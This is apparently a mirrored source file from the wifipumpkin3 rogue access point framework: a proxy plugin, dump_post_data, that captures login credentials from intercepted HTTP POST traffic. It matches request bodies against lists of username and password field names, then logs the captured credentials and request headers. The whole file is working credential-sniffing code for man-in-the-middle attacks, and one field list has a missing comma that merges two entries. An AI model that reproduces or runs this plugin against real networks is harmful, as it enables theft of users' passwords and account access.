mirror of
https://github.com/Cronocide/wifipumpkin3.git
synced 2025-01-23 03:39:18 +00:00
86 lines
3.9 KiB
Python
86 lines
3.9 KiB
Python
from plugins.extension.plugin import PluginTemplate
|
|
from PyQt4.QtCore import QObject,pyqtSignal
|
|
import re
|
|
from core.common.platforms import decoded
|
|
|
|
"""
|
|
Description:
|
|
This program is a core for wifi-pumpkin.py. file which includes functionality
|
|
plugins for Pumpkin-Proxy.
|
|
|
|
Copyright:
|
|
Copyright (C) 2015-2016 Marcos Nesster P0cl4bs Team
|
|
This program is free software: you can redistribute it and/or modify
|
|
it under the terms of the GNU General Public License as published by
|
|
the Free Software Foundation, either version 3 of the License, or
|
|
(at your option) any later version.
|
|
|
|
This program is distributed in the hope that it will be useful,
|
|
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
GNU General Public License for more details.
|
|
|
|
You should have received a copy of the GNU General Public License
|
|
along with this program. If not, see <http://www.gnu.org/licenses/>
|
|
"""
|
|
|
|
class dump_post_data(PluginTemplate):
|
|
meta = {
|
|
'Name' : 'dump_post_data',
|
|
'Version' : '1.0',
|
|
'Description' : 'Getting HTTP post data capture login post and logout pre event hook and its its working in web',
|
|
'Author' : 'Marcos Nesster'
|
|
}
|
|
def __init__(self):
|
|
for key,value in self.meta.items():
|
|
self.__dict__[key] = value
|
|
self.ConfigParser = False
|
|
|
|
def get_password_POST(self, content):
|
|
user = None
|
|
passwd = None
|
|
|
|
# Taken mainly from Pcredz by Laurent Gaffie
|
|
userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
|
|
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
|
|
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
|
|
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
|
|
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
|
|
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
|
|
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
|
|
'passwort', 'passwrd', 'wppassword', 'upasswd']
|
|
|
|
for login in userfields:
|
|
login_re = re.search('(%s=[^&]+)' % login, content, re.IGNORECASE)
|
|
if login_re:
|
|
user = login_re.group()
|
|
for passfield in passfields:
|
|
pass_re = re.search('(%s=[^&]+)' % passfield, content, re.IGNORECASE)
|
|
if pass_re:
|
|
passwd = pass_re.group()
|
|
|
|
if user and passwd:
|
|
return (user, passwd)
|
|
|
|
def request(self, flow):
|
|
self.send_output.append("FOR: " + flow.request.url +" "+ flow.request.method + " " + flow.request.path + " " + flow.request.http_version)
|
|
user_passwd = self.get_password_POST(flow.request.content.decode("utf-8"))
|
|
if user_passwd != None:
|
|
try:
|
|
http_user = user_passwd[0]
|
|
http_pass = user_passwd[1]
|
|
# Set a limit on how long they can be prevent false+
|
|
if len(http_user) > 75 or len(http_pass) > 75:
|
|
return
|
|
self.send_output.append("\n[{}][HTTP REQUEST HEADERS]\n".format(self.Name))
|
|
itens = dict(flow.request.headers)
|
|
for key in itens.keys():
|
|
self.send_output.append('{} : {}'.format(key,itens[key]))
|
|
self.send_output.append('\n')
|
|
self.send_output.append( 'HTTP username: %s' % http_user)
|
|
self.send_output.append( 'HTTP password: %s\n' % http_pass)
|
|
except UnicodeDecodeError:
|
|
pass
|
|
|
|
def response(self, flow):
|
|
pass |